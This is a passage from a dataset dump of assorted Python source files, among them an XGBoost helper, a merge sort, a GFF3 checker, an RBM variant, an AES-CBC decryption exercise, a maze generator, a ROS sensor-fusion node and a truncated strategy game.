\".format(root.data), end=\"\")\n\n def generatelist(self, root, l):\n x = root\n if x is None:\n return\n\n l.append(x)\n self.generatelist(x.left, l)\n self.generatelist(x.right, l)\n\n def sortedlist(self, root):\n l = []\n self.generatelist(root, l)\n ordenar(l, False)\n for i in l:\n print(\"|\", i.data, \"ocorrencia: \", i.occ, \"|\\n\")\n","sub_path":"src/avl.py","file_name":"avl.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"222363567","text":"import xgboost as xgb\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n\nclass XGBoost_kit:\n def __init__(self):\n pass\n\n def get_baseline_model(type, x_train, y_train):\n x_train = np.array(x_train, ndmin=2)\n y_train = np.array(y_train, ndmin=2)\n if (x_train.shape[0] != y_train.shape[0]):\n y_train = y_train.T\n if (x_train.shape[0] != y_train.shape[0]):\n print(\"x_train and y_train do not match in lenght: \", x_train.shape, \" vs \", y_train.shape)\n x_length = y_train.shape[1]\n\n x_train, x_test, y_train, y_test = train_test_split(x_train, y_train, test_size=0.2, random_state=123)\n print(x_train.shape, \" \", y_train.shape)\n\n if (type == 'regressor'):\n print(\"Regressor initiated\")\n xgb_model = xgb.XGBRegressor(\n colsample_bytree=0.1,\n gamma=0,\n learning_rate=0.01,\n max_depth=10,\n objective='reg:linear',\n min_child_weight=0.5,\n n_estimators=1000,\n reg_alpha=0,\n reg_lambda=0.45,\n subsample=0.6,\n seed=42)\n if (type == 'binary'):\n print(\"Binary Classifier initiated\")\n xgb_model = xgb.XGBClassifier(\n learning_rate=0.1,\n n_estimators=1000,\n max_depth=5,\n min_child_weight=1,\n gamma=0,\n subsample=0.8,\n colsample_bytree=0.8,\n objective='binary:logistic',\n nthread=4,\n scale_pos_weight=1,\n seed=27)\n if (type == 'multiclass'):\n print(\"Multiclass Classifier initiated\")\n xgb_model = xgb.XGBClassifier(\n learning_rate=0.1,\n n_estimators=1000,\n max_depth=5,\n min_child_weight=1,\n gamma=0,\n subsample=0.8,\n colsample_bytree=0.8,\n objective='multi:softprob',\n nthread=4,\n scale_pos_weight=1,\n seed=27)\n xgb_model.fit(x_train, y_train,\n eval_set=[(x_train, y_train),\n (x_test, y_test)],\n verbose=True,\n early_stopping_rounds=100)\n return xgb_model\n\n def get_model_stats(model):\n xgb.plot_importance(model)\n plt.rcParams['figure.figsize'] = [50, 50]\n plt.show()\n","sub_path":"XGBoost_kit.py","file_name":"XGBoost_kit.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"428928312","text":"n=int(input())\nA=tuple(map(int, input().split()))\ncnt=0\n\ndef merge_sort(A,cnt):\n m=len(A)\n if m == 1:\n return A,cnt\n else:\n mid=(m+1)//2\n A1=tuple(A[:mid])\n A2=tuple(A[mid:])\n A1,cnt=merge_sort(A1,cnt)\n A2,cnt=merge_sort(A2,cnt)\n n1=len(A1)\n n2=len(A2)\n i1=0\n i2=0\n ans=[0]*(n1+n2)\n j=0\n while j < n1+n2:\n if i1 == n1:\n ans[j]=A2[i2]\n i2+=1\n cnt+=1\n elif i2 == n2:\n ans[j]=A1[i1]\n i1+=1\n cnt+=1\n elif A1[i1] < A2[i2]:\n ans[j]=A1[i1]\n i1+=1\n cnt+=1\n else:\n ans[j]=A2[i2]\n i2+=1\n cnt+=1\n j += 1\n return ans,cnt\n\nsorted_A,cnt=merge_sort(A,0)\nprint(*sorted_A)\nprint(cnt)\n\n \n\n \n","sub_path":"Python_codes/p02272/s143569727.py","file_name":"s143569727.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"537815550","text":"# -*-coding:utf-8-*-\nimport argparse\nimport logging.handlers\nimport os\n\n\ndef logging_config(logging_name=\"video_classification.log\"):\n logging.basicConfig(\n handlers=[logging.handlers.RotatingFileHandler(logging_name, maxBytes=20 * 1024 * 1024, backupCount=5,\n encoding='utf-8')],\n level=logging.INFO,\n format=\"%(asctime)s - %(levelname)s %(filename)s %(funcName)s %(lineno)s - %(message)s\"\n )\n\n\ndef data_preprocess():\n # session_conf = tf.ConfigProto( # CPU GPU等切换\n # allow_soft_placement=True,\n # log_device_placement=False, # 记录设备指派情况; 获取你的 operations 和 Tensor 被指派到哪个设备上运行\n # device_count={'gpu': 0},\n # gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.4), # 高GPU占用情况下依旧运行\n # # 决定每个可见 GPU 应分配到的内存占总内存量的比例。\n # )\n from video_classifacation.data_utils.data_preprocessor import DataPreprocessor\n logging_config(logging_name=\"data_preprocess.log\")\n data_preprocessor = DataPreprocessor()\n data_preprocessor.get_video_label_and_readable_names_file()\n data_preprocessor.un_zip(count=-1) # 负数表示不限制数目\n data_preprocessor.extract_video_to_jpg(count=-1) # 视频 to jpg,负数表示不限制数目\n data_preprocessor.gather_jpg_info_to_excel(count=-1)\n data_preprocessor.extract_features() # 40 jpg to numpy array\n data_preprocessor.gather_features_npy_to_excel() # 从npy文件生成训练测试数据集,依据Config配置的train_count,test_count\n\n\ndef train():\n from video_classifacation.video_classification_01.train import train\n logging_config(logging_name=\"train.log\")\n train()\n\n\ndef predict():\n from video_classifacation.video_classification_01.prediction import Prediction\n from video_classifacation.video_classification_01.config_01 import Config_01 as Config\n logging_config(logging_name=\"predict.log\")\n # saved_model_path = os.path.join(Config.checkpoint_dir, \"lstm.010-2.603.hdf5\")\n # saved_model_path = os.path.join(Config.checkpoint_dir, \"lstm.009-0.900.hdf5\")\n predictor = Prediction(load_min_loss_model=True, saved_model_path='')\n video_path = os.path.join(Config.videos_dir, \"group0\", \"1000370.mp4\")\n video_path = os.path.join(Config.videos_dir, \"group0\", \"1004770.mp4\")\n _predict = predictor.predict(video_path)\n print(_predict)\n _predict = predictor.readable_predict(video_path)\n print(_predict)\n\n\ndef main():\n ''' Parse command line arguments and execute the code'''\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True) # 一组互斥参数,且至少需要互斥参数中的一个\n # import video and event\n group.add_argument('--data_handle', action=\"store_true\")\n group.add_argument('--train', action=\"store_true\")\n group.add_argument('--predict', action=\"store_true\")\n\n args = parser.parse_args()\n\n if args.data_handle:\n data_preprocess()\n elif args.predict:\n predict()\n elif args.train:\n train()\n\n\nif __name__ == '__main__':\n # data_preprocess()\n # predict()\n # train()\n main()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"535349850","text":"#! /usr/local/bin/python2.7\n# Contributed by Mei-Ju May Chen (2015)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n\nimport sys\nimport re\nimport logging\n# try to import from project first\nfrom os.path import dirname\nif dirname(__file__) == '':\n lib_path = '../lib'\nelse:\n lib_path = dirname(__file__) + '/../lib'\nsys.path.insert(1, lib_path)\nfrom gff3_modified import Gff3\nimport function4gff\nimport single_feature\nimport inter_model\nimport intra_model\nimport ERROR\n\n__version__ = '0.0.1'\n\nif __name__ == '__main__':\n logger_stderr = logging.getLogger(__name__+'stderr')\n logger_stderr.setLevel(logging.INFO)\n stderr_handler = logging.StreamHandler()\n stderr_handler.setFormatter(logging.Formatter('%(levelname)-8s %(message)s'))\n logger_stderr.addHandler(stderr_handler)\n logger_null = logging.getLogger(__name__+'null')\n null_handler = logging.NullHandler()\n logger_null.addHandler(null_handler)\n import argparse\n from textwrap import dedent\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description=dedent(\"\"\"\\\n \n Testing environment:\n 1. Python 2.7\n\n Inputs:\n 1. GFF3: Specify the file name with the -g or --gff argument; Please note that this program requires gene/pseudogene, mRNA/pseudogenic_transcirpt, and exon/pseudogenic_exon to have an ID attribute in column 9. For those features without IDs, it would automatically generate IDs based on the corresponding parent information. However, the ID generation would fail, if a feature has multiple parents.\n 2. fasta file: Specify the file name with the -f or --fasta argument\n\n Outputs:\n 1. Error report for the input GFF3 file.\n\n Quick start:\n python2.7 GFF3toolkit/bin/gff-QC.py -g small_files/annotations2.gff -f small_files/sample.fa -o test\n or\n python2.7 GFF3toolkit/bin/gff-QC.py --gff small_files/annotations2.gff --fasta small_files/sample.fa --output test\n\n \"\"\"))\n parser.add_argument('-g', '--gff', type=str, help='Genome annotation file, gff3 format') \n parser.add_argument('-f', '--fasta', type=str, help='Genome sequences, fasta format')\n parser.add_argument('-o', '--output', type=str, help='output file name (default: report.txt)')\n parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)\n \n args = parser.parse_args()\n\n if args.gff:\n logger_stderr.info('Checking gff file (%s)...', args.gff)\n elif not sys.stdin.isatty(): # if STDIN connected to pipe or file\n args.gff = sys.stdin\n logger_stderr.info('Reading from STDIN...')\n else: # no input\n parser.print_help()\n sys.exit(1)\n\n if args.fasta:\n logger_stderr.info('Checking genome fasta (%s)...', args.fasta)\n elif not sys.stdin.isatty(): # if STDIN connected to pipe or file\n args.fasta = sys.stdin\n logger_stderr.info('Reading from STDIN...')\n else: # no input\n parser.print_help()\n sys.exit(1)\n\n\n if args.output:\n logger_stderr.info('Specifying output file name: (%s)...\\n', args.output)\n report_fh = open(args.output, 'wb')\n else:\n report_fh = open('report.txt', 'wb')\n\n\n #ERROR_CODE = ['Esf0001', 'Esf0002', 'Ema0005', 'Emr0001'] \n #ERROR_TAG = ['pseudogene or not?', 'Negative/Zero start/end coordinate', 'unusual child features in the type of pseudogene found', 'Duplicate transcripts found']\n #ERROR_INFO = dict(zip(ERROR_CODE, ERROR_TAG))\n\n '''\n ERROR_INFO = {\n 'Ema0001': 'Parent feature start and end coordinates exceed those of child features',\n 'Ema0002': 'Protein sequence contains stop codons',\n #'Ema0003': 'This feature is not contained within the parent feature coordinates', # Error message has to be modified in gff3_modified.py\n 'Ema0004': 'Incomplete gene feature that should contain at least one mRNA, exon, and CDS',\n 'Ema0005': 'Pseudogene has invalid child feature type',\n #'Ema0006': 'Wrong phase', # Error message has to be modified in gff3_modified.py\n 'Ema0007': 'CDS and parent feature on different strands',\n #'Emr0001': 'Duplicate transcript found', # Error message has to be modified in lib/inter_model/inter_model.py\n 'Emr0002': 'Incorrectly merged gene parent?',\n 'Emr0003': 'Incorrectly split gene parent?',\n 'Emr0004': 'Isoforms that do not share coding sequence',\n #'Emr0005': 'Duplicate ID',\n 'Esf0001': 'Feature type may need to be changed to pseudogene',\n #'Esf0002': '[Start/Stop] is not a valid 1-based integer coordinate: \"[coordinate]\"', # Error message has to be modified in gff3_modified.py\n 'Esf0003': 'strand information missing',\n 'Esf0004': 'Seqid not found in any ##sequence-region',\n 'Esf0005': 'Start is less than the ##sequence-region start',\n 'Esf0006': 'End is greater than the ##sequence-region end',\n 'Esf0007': 'Seqid not found in the embedded ##FASTA',\n 'Esf0008': 'End is greater than the embedded ##FASTA sequence length',\n #'Esf0009': 'Caution: [type] feature (length: [N]) contains [X] consecutive N\\'s (start, length): ([Y], [X])', # Error message has to be modified in gff3_modified.py\n 'Esf0010': 'Seqid not found in the external FASTA file',\n 'Esf0011': 'End is greater than the external FASTA sequence length',\n #'Esf0012': 'Caution: [type] feature (length: [N]) contains [X] consecutive N\\'s (start, length): ([Y], [X])', # Error message has to be modified in gff3_modified.py\n 'Esf0013': 'White chars not allowed at the start of a line',\n 'Esf0014': '##gff-version\" missing from the first line',\n 'Esf0015': 'Expecting certain fields in the feature',\n 'Esf0016': '##sequence-region seqid may only appear once',\n 'Esf0017': 'Start/End is not a valid integer',\n 'Esf0018': 'Start is not less than or equal to end',\n 'Esf0019': 'Version is not \"3\"',\n 'Esf0020': 'Version is not a valid integer',\n 'Esf0021': 'Unknown directive',\n 'Esf0022': 'Features should contain 9 fields',\n 'Esf0023': 'escape certain characters',\n 'Esf0024': 'Score is not a valid floating point number',\n 'Esf0025': 'Strand has illegal characters',\n 'Esf0026': 'Phase is not 0, 1, or 2, or not a valid integer',\n 'Esf0027': 'Phase is required for all CDS features',\n 'Esf0028': 'Attributes must escape the percent (%) sign and any control characters',\n 'Esf0029': 'Attributes must contain one and only one equal (=) sign',\n #'Esf0030': 'Empty attribute tag', # Error message has to be modified in gff3_modified.py\n #'Esf0031': 'Empty attribute value', # Error message has to be modified in gff3_modified.py\n #'Esf0032': 'Found multiple attribute tags',\n 'Esf0033': 'Found \", \" in a attribute, possible unescaped',\n #'Esf0034': 'attribute has identical values (count, value)', # Error message has to be modified in gff3_modified.py\n 'Esf0035': 'attribute has unresolved forward reference',\n 'Esf0036': 'Value of a attribute contains unescaped \",\"',\n 'Esf0037': 'Target attribute should have 3 or 4 values',\n 'Esf0038': 'Start/End value of Target attribute is not a valid integer coordinate',\n 'Esf0039': 'Strand value of Target attribute has illegal characters',\n 'Esf0040': 'Value of Is_circular attribute is not \"true\"',\n 'Esf0041': 'Unknown reserved (uppercase) attribute'\n }\n '''\n\n logger_stderr.info('Reading gff files: (%s)...\\n', args.gff)\n gff3 = Gff3(gff_file=args.gff, fasta_external=args.fasta, logger=logger_null)\n logger_stderr.info('Checking errors in the gff files: (%s)...\\n', args.gff)\n gff3.check_unresolved_parents()\n gff3.check_parent_boundary()\n gff3.check_phase()\n gff3.check_reference()\n logger_stderr.info('\\t- Checking missing attributes: (%s)...\\n', 'single_feature.FIX_MISSING_ATTR()')\n\n error_set = list()\n if function4gff.extract_internal_detected_errors(gff3):\n error_set.extend(function4gff.extract_internal_detected_errors(gff3))\n logger_stderr.info('\\t- Checking intra-model errors: (%s)...\\n', args.gff)\n if intra_model.main(gff3, logger=logger_stderr):\n error_set.extend(intra_model.main(gff3, logger=logger_stderr))\n logger_stderr.info('\\t- Checking inter-model errors: (%s)...\\n', args.gff)\n if inter_model.main(gff3, logger=logger_stderr):\n error_set.extend(inter_model.main(gff3, logger=logger_stderr))\n logger_stderr.info('\\t- Checking single-feature errors: (%s)...\\n', args.gff)\n if inter_model.main(gff3, logger=logger_stderr):\n error_set.extend(single_feature.main(gff3, logger=logger_stderr))\n\n if args.output:\n logger_stderr.info('Print QC report at {0:s}'.format(args.output))\n else:\n logger_stderr.info('Print QC report at {0:s}'.format('report.txt'))\n\n ERROR_INFO = ERROR.INFO\n\n report_fh.write('ID\\tError_code\\tError_tag\\n')\n for e in error_set:\n tag = '[{0:s}]'.format(e['eTag'])\n report_fh.write('{0:s}\\t{1:s}\\t{2:s}\\n'.format(str(e['ID']), str(e['eCode']), str(tag)))\n","sub_path":"bin/gff-QC.py","file_name":"gff-QC.py","file_ext":"py","file_size_in_byte":9420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"334060342","text":"\n\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom rbm import RBM\nfrom util import sample_bernoulli\n\nclass BBRBMTEMP(RBM):\n def __init__(self, *args, **kwargs):\n RBM.__init__(self, *args, **kwargs)\n self.temp = 1\n def _initialize_vars(self):\n hidden_p = tf.nn.sigmoid(tf.matmul(self.x, self.w) + self.hidden_bias)\n visible_recon_p = tf.nn.sigmoid(tf.matmul(sample_bernoulli(hidden_p), tf.transpose(self.w)) + self.visible_bias)\n hidden_recon_p = tf.nn.sigmoid(tf.matmul(visible_recon_p, self.w) + self.hidden_bias)\n\n positive_grad = tf.matmul(tf.transpose(self.x), hidden_p)\n negative_grad = tf.matmul(tf.transpose(visible_recon_p), hidden_recon_p)\n\n def f(x_old, x_new):\n return self.momentum * x_old +\\\n self.learning_rate * x_new * (1 - self.momentum) / tf.to_float(tf.shape(x_new)[0])\n\n delta_w_new = f(self.delta_w, positive_grad - negative_grad)\n delta_visible_bias_new = f(self.delta_visible_bias, tf.reduce_mean(self.x - visible_recon_p, 0))\n delta_hidden_bias_new = f(self.delta_hidden_bias, tf.reduce_mean(hidden_p - hidden_recon_p, 0))\n\n update_delta_w = self.delta_w.assign(delta_w_new)\n update_delta_visible_bias = self.delta_visible_bias.assign(delta_visible_bias_new)\n update_delta_hidden_bias = self.delta_hidden_bias.assign(delta_hidden_bias_new)\n\n update_w = self.w.assign(self.w + delta_w_new)\n update_visible_bias = self.visible_bias.assign(self.visible_bias + delta_visible_bias_new)\n update_hidden_bias = self.hidden_bias.assign(self.hidden_bias + delta_hidden_bias_new)\n\n self.update_deltas = [update_delta_w, update_delta_visible_bias, update_delta_hidden_bias]\n self.update_weights = [update_w, update_visible_bias, update_hidden_bias]\n #print(\"sel.temp is \", self.temp)\n #if(self.temp == 0.0): #temperature zero\n #print(\"i am inside if-sta of t =0\")\n compute_hidden_real1 = tf.matmul(self.x, self.w) + self.hidden_bias\n compute_hidden_real1 = tf.where(compute_hidden_real1 < 0.0, tf.zeros_like(compute_hidden_real1),compute_hidden_real1)\n compute_hidden_real1 = tf.where(compute_hidden_real1 > 0.0, tf.ones_like(compute_hidden_real1),compute_hidden_real1)\n #pick zero or one randomly when a = 0\n\n if(np.random.uniform(0,1) > 0.5): # binarize the hiddens \n pick_x = tf.ones_like(compute_hidden_real1) #create a tensor of ones with same shape as compute_hidden_real1\n else: \n pick_x = tf.zeros_like(compute_hidden_real1)\n\n compute_hidden_real1 = tf.where(compute_hidden_real1 == 0.0, pick_x,compute_hidden_real1)\n\n #binarize hidden (i think no need to binarize since the above process does that)\n #h_st_bin = tf.math.greater(compute_hidden_real, tf.random.uniform([64]))\n #compute_hidden = tf.cast(h_st_bin, tf.float32)\n self.compute_hidden1 = compute_hidden_real1#compute_hidden########\n #######\n #sigmoid fct for t = 0\n compute_visible_real1 = tf.matmul(self.compute_hidden1, tf.transpose(self.w)) + self.visible_bias\n compute_visible_real1 = tf.where(compute_visible_real1 < 0.0, tf.zeros_like(compute_visible_real1),\n compute_visible_real1)\n compute_visible_real1 = tf.where(compute_visible_real1 > 0.0, tf.ones_like(compute_visible_real1),\n compute_visible_real1)\n # pick zero or one randomly when a = 0\n\n if (np.random.uniform(0, 1) > 0.5):\n pick_x = tf.ones_like(compute_visible_real1)\n else:\n pick_x = tf.zeros_like(compute_visible_real1)\n\n compute_visible_real1 = tf.where(compute_visible_real1 == 0.0, pick_x, compute_visible_real1)\n\n #self.compute_visible_real = compute_visible_real\n\n #binarize visual\n #v_st_bin = tf.math.greater(compute_visible_real, tf.random.uniform([794]))\n #compute_visible = tf.cast(v_st_bin, tf.float32)\n self.compute_visible1 = compute_visible_real1 #compute_visible ########\n #else: #temperature other than zero\n #print(\"i am inside else-sta of t not 0\")\n #compute hidden units\n compute_hidden_real2 = tf.nn.sigmoid(tf.math.divide(tf.matmul(self.x, self.w) + self.hidden_bias,self.temp))\n #binarize hidden\n h_st_bin = tf.math.greater(compute_hidden_real2, tf.random.uniform([64]))\n compute_hidden = tf.cast(h_st_bin, tf.float32)\n self.compute_hidden2 = compute_hidden\n #compute the visible units\n compute_visible_real2 = tf.nn.sigmoid(tf.math.divide(tf.matmul(self.compute_hidden2, tf.transpose(self.w)) + self.visible_bias,self.temp))\n # binarize visual\n v_st_bin = tf.math.greater(compute_visible_real2, tf.random.uniform([794]))\n compute_visible2 = tf.cast(v_st_bin, tf.float32)\n self.compute_visible2 = compute_visible2 ########\n ######\n self.compute_visible_from_hidden = tf.nn.sigmoid(tf.matmul(self.y, tf.transpose(self.w)) + self.visible_bias)","sub_path":"tfrbm/bbrbm_temp_backup.py","file_name":"bbrbm_temp_backup.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"189402549","text":"#!/usr/bin/env python\n\n\"\"\"robot_correction.py - Version 1.0 2016-10-12\nAuthor: Jonathan Hodges\n\nThis code calculates the mean and covariance of robot position using\nfused odometry and estimation based on lidar feature matching.\n\nSubscribers:\n /odometry/filtered - robot odometry estimation\n /jfr/robot/pos/lidar - robot position estimation from lidar feature matching.\n\nPublishers:\n /jfr/robot/correction - corrected robot position\n\nThis program is free software; you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation; either version 2 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE. See the GNU General Public License for more details at:\nhttp://www.gnu.org/licenses/gpl.html\n\n\"\"\"\n\nimport roslib; roslib.load_manifest('urg_node')\nimport rospy\nimport sensor_msgs.msg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as sc\nimport scipy.signal as sg\nimport scipy.misc as ms\nimport scipy.spatial.distance as scd\nfrom rospy.numpy_msg import numpy_msg\nfrom rospy_tutorials.msg import Floats\nfrom nav_msgs.msg import Odometry\nimport StringIO\nfrom sensor_msgs.msg import Image\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\nimport urllib, base64\nimport os\nimport sys\nimport math\nimport tf\nimport time\nimport scipy.linalg as linalg\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nimport std_msgs.msg\n\nclass robot_correction():\n def __init__(self):\n rospy.init_node('robot_correction', anonymous=True)\n self.cov_publisher = rospy.Publisher('/jfr/robot/correction',PoseWithCovarianceStamped,queue_size=1)\n self.robot_cov = None\n self.lidar_cov = None\n rospy.Subscriber('/odometry/filtered',Odometry, self.cb_rl)\n rospy.Subscriber('/jfr/robot/pos/lidar',PoseWithCovarianceStamped, self.cb_lidar) #lidar matching\n while not rospy.is_shutdown():\n if self.robot_cov is not None and self.lidar_cov is not None:\n self.fusion(np.array(self.robot_cov),np.array(self.lidar_cov),np.array(self.robot_state),np.array(self.lidar_state))\n else:\n rospy.sleep(0.01)\n\n def cb_rl(self, data):\n self.robot_whole_cov = np.array(data.pose.covariance)\n self.robot_state,self.robot_cov = self.pose2state(data.pose)\n \n def cb_lidar(self, data):\n self.lidar_state,self.lidar_cov = self.pose2state(data.pose)\n\n def pose2state(self, pose):\n oppp = pose.pose.position\n oppo = pose.pose.orientation\n #print(np.shape(pose.covariance))\n cov = [[pose.covariance[0],pose.covariance[1],pose.covariance[5]],\n [pose.covariance[6],pose.covariance[7],pose.covariance[11]],\n [pose.covariance[30],pose.covariance[31],pose.covariance[35]]]\n oppoe = tf.transformations.euler_from_quaternion([oppo.x,oppo.y,oppo.z,oppo.w])\n state = np.array([oppp.x,oppp.y,oppoe[2]])\n return state, cov\n\n def state2pose(self, state, cov):\n #print(cov)\n output = PoseWithCovarianceStamped()\n output.pose.pose.position.x = state[0]\n output.pose.pose.position.y = state[1]\n output.pose.pose.position.z = 0\n\n oppo = tf.transformations.quaternion_from_euler(0,0,state[2])\n output.pose.pose.orientation.x = oppo[0]\n output.pose.pose.orientation.y = oppo[1]\n output.pose.pose.orientation.z = oppo[2]\n output.pose.pose.orientation.w = oppo[3]\n new_cov = self.robot_whole_cov\n #print(new_cov)\n new_cov[0] = cov[0]\n new_cov[1] = cov[1]\n new_cov[5] = cov[2]\n new_cov[6] = cov[3]\n new_cov[7] = cov[4]\n new_cov[11] = cov[5]\n new_cov[30] = cov[6]\n new_cov[31] = cov[7]\n new_cov[35] = cov[8]\n output.pose.covariance = new_cov.flatten()\n\n h = std_msgs.msg.Header()\n h.stamp = rospy.Time.now()\n h.frame_id = 'base_link'\n output.header = h\n return output\n\n def fusion(self, robot_cov, lidar_cov, robot_state, lidar_state):\n #print(np.shape(robot_cov),np.shape(lidar_cov))\n c_mat = np.array([[1,0,0],[0,1,0],[0,0,1]])\n #print(\"robot_cov:\")\n #print(robot_cov)\n #print(\"lidar_cov:\")\n #print(lidar_cov)\n\n gain = np.dot(np.dot(robot_cov,c_mat),np.linalg.inv(np.dot(np.dot(c_mat,robot_cov),c_mat.T)+lidar_cov))\n\n #print(\"gain\")\n #print(gain)\n gain[np.isnan(gain)] = 10**-20\n gain = np.reshape(gain,(3,3))\n new_cov = np.dot((np.identity(3)-np.dot(gain,c_mat)),np.reshape(robot_cov,(3,3)))\n new_cov = np.reshape(new_cov,(9,))\n new_state = robot_state+np.dot(gain,(lidar_state-np.dot(c_mat,robot_state)))\n #print(lidar_state,robot_state,new_state)\n #print('robot_cov\\t lidar_cov\\t gain\\t\\t new_cov\\t new_x')\n #print('%.4e\\t%.4e\\t%.4e\\t%.4e\\t%.4f'%(robot_cov[0][0],lidar_cov[0][0],gain[0][0],new_cov[0],new_state[0]))\n output = self.state2pose(new_state, new_cov)\n self.cov_publisher.publish(output)\n rospy.sleep(0.02)\n self.robot_cov = None\n self.lidar_cov = None\n\n\nif __name__ == '__main__':\n rospy.loginfo('Looking for object...')\n robot_correction()\n rospy.spin()\n","sub_path":"autonomy/src/robot_correction.py","file_name":"robot_correction.py","file_ext":"py","file_size_in_byte":5459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"420493101","text":"#!/usr/bin/python3\n\nimport base64\nimport re\nimport sys\nfrom Crypto.Cipher import AES\n\n\ndef die(msg, name=sys.argv[0]):\n print('%s:' % name, msg, file=sys.stderr)\n sys.exit(84)\n\n\ndef main(args):\n if len(args) != 2:\n die('invalid number of arguments')\n try:\n with open(args[1], 'r') as f:\n key = bytes.fromhex(re.sub(r'\\s', '', f.readline()))\n iv = bytes.fromhex(re.sub(r'\\s', '', f.readline()))\n data = base64.b64decode(f.read())\n if len(key) == 0 or len (data) == 0:\n raise ValueError()\n if len(iv) != 16 or len(data) % 16 != 0:\n raise ValueError()\n except IOError as e:\n die('cannot open or read file: %s' % e.strerror, name=args[1])\n except ValueError:\n die('invalid data in file', name=args[1])\n\n padding = 16 - (len(data) % 16)\n data += bytes(padding for i in range(padding))\n blocks = [data[i:i+16] for i in range(0, len(data), 16)]\n try:\n aes = AES.new(key, AES.MODE_ECB)\n clear = b''.join(bytes(b ^ v for b, v in zip(aes.decrypt(block), iv)) for block, iv in zip(blocks, [iv] + blocks))\n except ValueError:\n die('invalid key or ciphertext')\n\n print(base64.b64encode(clear[:-clear[-1]]).decode())\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"src/challenge09.py","file_name":"challenge09.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"424617334","text":"import random\nfrom PIL import Image\nimport numpy as np\n\n\nimgx = 500\nimgy = 500\nimage = Image.new(\"RGB\", (imgx, imgy))\npixels = image.load()\nmx = 50\nmy = 50 # width and height of the maze\nmaze = [[0 for x in range(mx)] for y in range(my)]\ndx = [0, 1, 0, -1]\ndy = [-1, 0, 1, 0] # 4 directions to move in the maze\ncolor = [(0, 0, 0), (255, 255, 255),(0, 255, 0),(255, 0, 0)] # RGB colors of the maze\n# start the maze from a random cell\ncx = random.randint(0, mx - 1)\ncy = random.randint(0, my - 1)\nmaze[cy][cx] = 1\nstack = [(cx, cy, 0)] # stack element: (x, y, direction)\n'''\nwhile len(stack) > 0:\n (cx, cy, cd) = stack[-1]\n # to prevent zigzags:\n # if changed direction in the last move then cannot change again\n if len(stack) > 2:\n if cd != stack[-2][2]:\n dirRange = [cd]\n else:\n dirRange = range(4)\n else:\n dirRange = range(4)\n\n # find a new cell to add\n nlst = [] # list of available neighborsimg\n for i in dirRange:\n nx = cx + dx[i]\n ny = cy + dy[i]\n if 0 <= nx < mx and 0 <= ny < my:\n if maze[ny][nx] == 0:\n ctr = 0 # of occupied neighbors must be 1\n for j in range(4):\n ex = nx + dx[j]\n ey = ny + dy[j]\n if 0 <= ex < mx and 0 <= ey < my:\n if maze[ey][ex] == 1:\n ctr += 1\n if ctr == 1:\n nlst.append(i)\n\n # if 1 or more neighbors available then randomly select one and move\n if len(nlst) > 0:\n ir = nlst[random.randint(0, len(nlst) - 1)]\n cx += dx[ir]\n cy += dy[ir]\n maze[cy][cx] = 1\n stack.append((cx, cy, ir))\n else:\n stack.pop()\n# change it to [0,1] list\nmaze[0][0] = 3 # end point\nmaze[my-1][mx-1] = 2 # start point\n\nfor i in range(len(maze)):\n print maze[i]\n'''\nmaze = np.load('maze.npy')\n\n# save maze in array form\nfor ky in range(imgy):\n for kx in range(imgx):\n pixels[kx, ky] = color[maze[my * ky / imgy][mx * kx / imgx]]\n\n\n#np.save('maze',maze)\n\nimage.show(\"Maze_\" + str(mx) + \"x\" + str(my) + \".png\", \"PNG\")\n\nimage.save(\"Maze_\" + str(mx) + \"x\" + str(my) + \".png\", \"PNG\")","sub_path":"EL_homeWork/maze_generator.py","file_name":"maze_generator.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"69859859","text":"from enum import IntEnum, auto\nfrom camp import Camp\nfrom map import Map_node\n\nimport random, sys\n\nclass Game:\n def __init__(self, map_size, num_camp):\n self.turn = 0\n self.action_dict = [\"BOOST\", \"DRAFT\", \"INVADE\"]\n self.entire_map = self.make_entire_map(map_size)\n self.camps = [Camp(i, self.action_dict, money=10000, mil_power=1000) for i in range(num_camp)]\n for i in range(len(self.entire_map)):\n random.choice(self.get_empty_nodes()).ruler = i\n\n def process(self):\n self.turn += 1\n # ターン開始前処理\n for i in range(len(self.camps)):\n self.camps[i].money += sum([i.prosperity for i in self.get_our_nodes(i)])\n \n for i in range(len(self.camps)):\n choice, target, strength = self.camps[i].action()\n if choice == \"BOOST\":\n if self.camps[i].spend_money(strength):\n self.boost(random.choice(self.get_our_nodes(i)), strength)\n elif choice == \"DRAFT\":\n if 